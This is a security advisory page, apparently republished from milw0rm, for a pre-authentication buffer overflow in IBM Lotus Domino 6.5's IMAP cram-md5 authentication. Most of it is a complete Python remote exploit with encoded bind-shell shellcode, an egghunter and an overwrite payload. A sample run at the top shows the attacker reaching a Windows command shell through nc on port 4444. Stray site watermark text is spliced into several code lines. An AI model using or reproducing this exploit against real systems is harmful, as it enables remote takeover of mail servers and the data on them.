IBM Lotus Domino Server

Summary
IBM Lotus Domino Server software "provides messaging, calendaring and scheduling capabilities on a variety of operating systems".

A vulnerability in IBM Lotus Domino server allows attackers to overflow an internal buffer used by the server's cram-md5 authentication mechanism.
 
Credit:
The information has been provided by milw0rm.
The original article can be found at:
http://www.milw0rm.com/exploits/3616  
 
 Details
 liveVulnerable Systems:
 * IBM Lotus Domino Server 6.5

Exploit:
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38 网管bitscn_com
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:\Lotus\Domino>


import sys
import md5
import struct 网管联盟bitsCN@com
import base64
import socket

def sendbind(target):
        bindshell ="\x90"* 400 # Metasploit bind shell port 4444
        bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
        bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
        "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
        "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
        "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
        "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
        "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
        "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" 网管u家u.bitsCN.com
        "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
        "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
        "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
        "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
        "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
        "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
        "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
        "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
        "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
        "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" 网管下载dl.bitscn.com
        "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
        "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
        "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
        "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
        "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
        "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
        "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
        "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
        "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
        "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"

网管联盟bitsCN_com

        "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
        "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
        "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
        "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
        "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
        "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
        "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
        "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
        "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
        "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"

中国网管联盟bitsCN.com

        "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
        "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
        "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
        "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
        "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
        "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
        "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
        "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target, 143))
        response = sock.recv(1024)
        bind = 'a001 admin ' + bindshell +'\r\n'
        print "[*] Sending bindshell *somewhere* into memory"
        sock.send(bind)
        response = sock.recv(1024)
        sock.close()

def ExploitLotus(target):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target, 143))
        response = sock.recv(1024)
        print response
        auth = 'a001 authenticate cram-md5\r\n'
        sock.send(auth)
        response = sock.recv(1024)
        print response
        m = md5.new()
        m.update(response[2:0])

网管论坛bbs_bitsCN_com

        digest = m.digest()
        payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210

        # 0x774b4c6a CALL [EAX +4]

        payload += "jLKw"
        payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
        login = payload + ' ' + digest
        login = base64.encodestring(login) + '\r\n'
        print "[*] Triggering overwrite, ph33r."
        sock.send(login)
        sock.close()
        print "[*] You may need to wait up to 2 minutes"
        print "[*] for egghunter to find da shell." 网管下载dl.bitscn.com

if __name__=="__main__":
        try:
                target = sys.argv[1]
        except IndexError:
                print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
                print '[*] Usage: %s <imap server>\n' % sys.argv[0]
               
                sys.exit(-1)
       
        print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
        sendbind(target)
        sendbind(target)
        sendbind(target)
        sendbind(target) 网管u家u.bitsCN.com
        ExploitLotus(target)